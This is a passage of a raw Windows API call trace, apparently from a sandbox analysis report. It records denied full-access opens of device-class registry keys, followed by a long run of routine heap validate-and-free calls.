lpSubKey="WudfUsbccidDriver", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.670] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{36FC9E60-C465-11CF-8056-444553540000}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.670] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E965-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.670] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E967-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.670] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E969-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.671] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96A-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.671] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.671] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96F-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.672] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E972-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.672] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E973-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.672] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E974-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.672] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E975-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.673] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E977-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.673] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.673] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97D-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.673] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E980-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.673] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{50DD5230-BA8A-11D1-BF5D-0000F805F530}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.674] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.674] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.674] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.674] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.674] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.674] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.675] GetProcessHeap () returned 0x510000 [0085.675] GetProcessHeap () returned 0x510000 [0085.675] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523ab8) returned 1 [0085.675] GetProcessHeap () returned 0x510000 [0085.675] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523ab8) returned 0x8 [0085.675] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523ab8 | out: hHeap=0x510000) returned 1 [0085.675] GetProcessHeap () returned 0x510000 [0085.675] GetProcessHeap () returned 0x510000 [0085.675] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525b28) returned 1 [0085.675] GetProcessHeap () returned 0x510000 [0085.675] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525b28) returned 0x14 [0085.675] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525b28 | out: hHeap=0x510000) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525df8) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525df8) returned 0x10 [0085.676] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525df8 | out: hHeap=0x510000) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525b08) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525b08) returned 0x14 [0085.676] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525b08 | out: hHeap=0x510000) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e10) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e10) returned 0x10 [0085.676] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e10 | out: hHeap=0x510000) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ae8) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ae8) returned 0x14 [0085.676] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ae8 | out: hHeap=0x510000) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e28) returned 1 [0085.676] GetProcessHeap () returned 0x510000 [0085.676] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e28) returned 0xa [0085.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e28 | out: hHeap=0x510000) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ac8) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ac8) returned 0x14 [0085.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ac8 | out: hHeap=0x510000) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525238) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525238) returned 0x8 [0085.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525238 | out: hHeap=0x510000) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525aa8) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525aa8) returned 0x14 [0085.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525aa8 | out: hHeap=0x510000) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5250a8) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5250a8) returned 0x24 [0085.677] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5250a8 | out: hHeap=0x510000) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] GetProcessHeap () returned 0x510000 [0085.677] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a88) returned 1 [0085.677] GetProcessHeap () returned 0x510000 [0085.678] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a88) returned 0x14 [0085.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a88 | out: hHeap=0x510000) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5250d8) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5250d8) returned 0x22 [0085.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5250d8 | out: hHeap=0x510000) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a68) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a68) returned 0x14 [0085.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a68 | out: hHeap=0x510000) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e40) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e40) returned 0xe [0085.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e40 | out: hHeap=0x510000) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a48) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.678] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a48) returned 0x14 [0085.678] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a48 | out: hHeap=0x510000) returned 1 [0085.678] GetProcessHeap () returned 0x510000 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e58) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e58) returned 0x10 [0085.679] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e58 | out: hHeap=0x510000) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a28) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a28) returned 0x14 [0085.679] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a28 | out: hHeap=0x510000) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a08) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a08) returned 0x12 [0085.679] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a08 | out: hHeap=0x510000) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5259e8) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5259e8) returned 0x14 [0085.679] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5259e8 | out: hHeap=0x510000) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5259c8) returned 1 [0085.679] GetProcessHeap () returned 0x510000 [0085.679] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5259c8) returned 0x16 [0085.680] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5259c8 | out: hHeap=0x510000) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5259a8) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5259a8) returned 0x14 [0085.680] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5259a8 | out: hHeap=0x510000) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e70) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e70) returned 0xa [0085.680] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e70 | out: hHeap=0x510000) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525988) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525988) returned 0x14 [0085.680] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525988 | out: hHeap=0x510000) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525e88) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e88) returned 0xa [0085.680] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e88 | out: hHeap=0x510000) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525968) returned 1 [0085.680] GetProcessHeap () returned 0x510000 [0085.680] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525968) returned 0x14 [0085.680] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525968 | out: hHeap=0x510000) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525948) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525948) returned 0x12 [0085.681] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525948 | out: hHeap=0x510000) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525928) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525928) returned 0x14 [0085.681] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525928 | out: hHeap=0x510000) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ea0) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ea0) returned 0x10 [0085.681] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ea0 | out: hHeap=0x510000) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525908) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525908) returned 0x14 [0085.681] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525908 | out: hHeap=0x510000) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525eb8) returned 1 [0085.681] GetProcessHeap () returned 0x510000 [0085.681] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525eb8) returned 0x10 [0085.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525eb8 | out: hHeap=0x510000) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5258e8) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5258e8) returned 0x14 [0085.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5258e8 | out: hHeap=0x510000) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525248) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525248) returned 0x8 [0085.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525248 | out: hHeap=0x510000) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5258c8) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5258c8) returned 0x14 [0085.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5258c8 | out: hHeap=0x510000) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5258a8) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5258a8) returned 0x12 [0085.682] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5258a8 | out: hHeap=0x510000) returned 1 [0085.682] GetProcessHeap () returned 0x510000 [0085.682] GetProcessHeap () returned 0x510000 [0085.683] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525888) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525888) returned 0x14 [0085.683] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525888 | out: hHeap=0x510000) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525868) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525868) returned 0x18 [0085.683] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525868 | out: hHeap=0x510000) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525848) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525848) returned 0x14 [0085.683] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525848 | out: hHeap=0x510000) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ed0) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ed0) returned 0xe [0085.683] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ed0 | out: hHeap=0x510000) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525828) returned 1 [0085.683] GetProcessHeap () returned 0x510000 [0085.683] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525828) returned 0x14 [0085.684] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525828 | out: hHeap=0x510000) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ee8) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ee8) returned 0x10 [0085.684] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ee8 | out: hHeap=0x510000) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525808) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525808) returned 0x14 [0085.684] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525808 | out: hHeap=0x510000) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f00) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f00) returned 0xe [0085.684] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f00 | out: hHeap=0x510000) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5257e8) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5257e8) returned 0x14 [0085.684] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5257e8 | out: hHeap=0x510000) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5257c8) returned 1 [0085.684] GetProcessHeap () returned 0x510000 [0085.684] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5257c8) returned 0x14 [0085.685] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5257c8 | out: hHeap=0x510000) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5257a8) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5257a8) returned 0x14 [0085.685] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5257a8 | out: hHeap=0x510000) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f18) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f18) returned 0xe [0085.685] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f18 | out: hHeap=0x510000) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525788) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525788) returned 0x14 [0085.685] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525788 | out: hHeap=0x510000) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523ff0) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523ff0) returned 0x1a [0085.685] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523ff0 | out: hHeap=0x510000) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] GetProcessHeap () returned 0x510000 [0085.685] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525768) returned 1 [0085.685] GetProcessHeap () returned 0x510000 [0085.686] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525768) returned 0x14 [0085.686] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525768 | out: hHeap=0x510000) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526270) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526270) returned 0x24 [0085.686] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526270 | out: hHeap=0x510000) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525748) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] RtlSizeHeap 